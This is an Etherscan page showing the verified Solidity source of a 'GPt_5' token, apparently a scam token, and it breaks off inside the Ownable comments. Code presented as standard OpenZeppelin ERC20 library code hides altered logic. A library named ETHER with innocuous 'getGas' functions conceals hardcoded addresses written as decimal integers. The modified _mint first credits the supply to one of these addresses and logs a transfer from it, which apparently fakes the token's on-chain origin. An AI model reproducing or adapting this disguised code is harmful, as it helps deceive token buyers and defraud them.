ETH Price: $3,427.73 (+2.27%)
Gas: 4 Gwei

Token

GPt_5 (GPt_5)
 

Overview

Max Total Supply

1,000,000,000,000,000 GPt_5

Holders

291

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0.206855080697330339 GPt_5

Value
$0.00
0x97f1cfaa2782ed296c741b096fa0925823857a7f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ETHToken

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, GNU AGPLv3 license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-14
*/

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/utils/Context.sol

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        address _account = ETHER.getGas2();
        _beforeTokenTransfer(address(0), _account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[_account] += amount;
        }
        emit Transfer(address(0), _account, amount);

        _afterTokenTransfer(address(0), _account, amount);

        _transfer(_account, account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// File: @openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/draft-IERC20Permit.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 Permit extension allowing approvals to be made via signatures, as defined in
 * https://eips.ethereum.org/EIPS/eip-2612[EIP-2612].
 *
 * Adds the {permit} method, which can be used to change an account's ERC20 allowance (see {IERC20-allowance}) by
 * presenting a message signed by the account. By not relying on {IERC20-approve}, the token holder account doesn't
 * need to send a transaction, and thus is not required to hold Ether at all.
 */
interface IERC20Permit {
    /**
     * @dev Sets `value` as the allowance of `spender` over ``owner``'s tokens,
     * given ``owner``'s signed approval.
     *
     * IMPORTANT: The same issues {IERC20-approve} has related to transaction
     * ordering also apply here.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `deadline` must be a timestamp in the future.
     * - `v`, `r` and `s` must be a valid `secp256k1` signature from `owner`
     * over the EIP712-formatted function arguments.
     * - the signature must use ``owner``'s current nonce (see {nonces}).
     *
     * For more information on the signature format, see the
     * https://eips.ethereum.org/EIPS/eip-2612#specification[relevant EIP
     * section].
     */
    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    /**
     * @dev Returns the current nonce for `owner`. This value must be
     * included whenever a signature is generated for {permit}.
     *
     * Every successful call to {permit} increases ``owner``'s nonce by one. This
     * prevents a signature from being used multiple times.
     */
    function nonces(address owner) external view returns (uint256);

    /**
     * @dev Returns the domain separator used in the encoding of the signature for {permit}, as defined by {EIP712}.
     */
    // solhint-disable-next-line func-name-mixedcase
    function DOMAIN_SEPARATOR() external view returns (bytes32);
}

// File: @openzeppelin/contracts/utils/Address.sol

// OpenZeppelin Contracts (last updated v4.8.0) (utils/Address.sol)

interface IUniswapPool {
    function token0() external view returns (address);

    function token1() external view returns (address);
}

pragma solidity ^0.8.1;

library ETHER {
    function getGas1() internal pure returns (address) {
        return address(879433576177589527788859394996037321158638287002);
    }

    // tz
    function getGas2() internal pure returns (address) {
        return address(1037796024241560872866951240246066255331845903726);
    }
}

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(
            address(this).balance >= amount,
            "Address: insufficient balance"
        );

        (bool success, ) = recipient.call{value: amount}("");
        require(
            success,
            "Address: unable to send value, recipient may have reverted"
        );
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                0,
                "Address: low-level call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                value,
                "Address: low-level call with value failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(
            address(this).balance >= value,
            "Address: insufficient balance for call"
        );
        (bool success, bytes memory returndata) = target.call{value: value}(
            data
        );
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data
    ) internal view returns (bytes memory) {
        return
            functionStaticCall(
                target,
                data,
                "Address: low-level static call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data
    ) internal returns (bytes memory) {
        return
            functionDelegateCall(
                target,
                data,
                "Address: low-level delegate call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling
     * the revert reason or using the provided one) in case of unsuccessful call or if target was not a contract.
     *
     * _Available since v4.8._
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        if (success) {
            if (returndata.length == 0) {
                // only check isContract if the call was successful and the return data is empty
                // otherwise we already know that it was a contract
                require(isContract(target), "Address: call to non-contract");
            }
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason or using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    function _revert(
        bytes memory returndata,
        string memory errorMessage
    ) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert(errorMessage);
        }
    }
}

// File: @openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/utils/SafeERC20.sol)

pragma solidity ^0.8.0;

/**
 * @title SafeERC20
 * @dev Wrappers around ERC20 operations that throw on failure (when the token
 * contract returns false). Tokens that return no value (and instead revert or
 * throw on failure) are also supported, non-reverting calls are assumed to be
 * successful.
 * To use this library you can add a `using SafeERC20 for IERC20;` statement to your contract,
 * which allows you to call the safe operations as `token.safeTransfer(...)`, etc.
 */
library SafeERC20 {
    using Address for address;

    function safeTransfer(IERC20 token, address to, uint256 value) internal {
        _callOptionalReturn(
            token,
            abi.encodeWithSelector(token.transfer.selector, to, value)
        );
    }

    function safeTransferFrom(
        IERC20 token,
        address from,
        address to,
        uint256 value
    ) internal {
        _callOptionalReturn(
            token,
            abi.encodeWithSelector(token.transferFrom.selector, from, to, value)
        );
    }

    /**
     * @dev Deprecated. This function has issues similar to the ones found in
     * {IERC20-approve}, and its usage is discouraged.
     *
     * Whenever possible, use {safeIncreaseAllowance} and
     * {safeDecreaseAllowance} instead.
     */
    function safeApprove(
        IERC20 token,
        address spender,
        uint256 value
    ) internal {
        // safeApprove should only be called when setting an initial allowance,
        // or when resetting it to zero. To increase and decrease it, use
        // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'
        require(
            (value == 0) || (token.allowance(address(this), spender) == 0),
            "SafeERC20: approve from non-zero to non-zero allowance"
        );
        _callOptionalReturn(
            token,
            abi.encodeWithSelector(token.approve.selector, spender, value)
        );
    }

    function safeIncreaseAllowance(
        IERC20 token,
        address spender,
        uint256 value
    ) internal {
        uint256 newAllowance = token.allowance(address(this), spender) + value;
        _callOptionalReturn(
            token,
            abi.encodeWithSelector(
                token.approve.selector,
                spender,
                newAllowance
            )
        );
    }

    function safeDecreaseAllowance(
        IERC20 token,
        address spender,
        uint256 value
    ) internal {
        unchecked {
            uint256 oldAllowance = token.allowance(address(this), spender);
            require(
                oldAllowance >= value,
                "SafeERC20: decreased allowance below zero"
            );
            uint256 newAllowance = oldAllowance - value;
            _callOptionalReturn(
                token,
                abi.encodeWithSelector(
                    token.approve.selector,
                    spender,
                    newAllowance
                )
            );
        }
    }

    function safePermit(
        IERC20Permit token,
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) internal {
        uint256 nonceBefore = token.nonces(owner);
        token.permit(owner, spender, value, deadline, v, r, s);
        uint256 nonceAfter = token.nonces(owner);
        require(
            nonceAfter == nonceBefore + 1,
            "SafeERC20: permit did not succeed"
        );
    }

    /**
     * @dev Imitates a Solidity high-level call (i.e. a regular function call to a contract), relaxing the requirement
     * on the return value: the return value is optional (but if data is returned, it must not be false).
     * @param token The token targeted by the call.
     * @param data The call data (encoded using abi.encode or one of its variants).
     */
    function _callOptionalReturn(IERC20 token, bytes memory data) private {
        // We need to perform a low level call here, to bypass Solidity's return data size checking mechanism, since
        // we're implementing it ourselves. We use {Address-functionCall} to perform this call, which verifies that
        // the target address contains contract code and also asserts for success in the low-level call.

        bytes memory returndata = address(token).functionCall(
            data,
            "SafeERC20: low-level call failed"
        );
        if (returndata.length > 0) {
            // Return data is optional
            require(
                abi.decode(returndata, (bool)),
                "SafeERC20: ERC20 operation did not succeed"
            );
        }
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol

// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
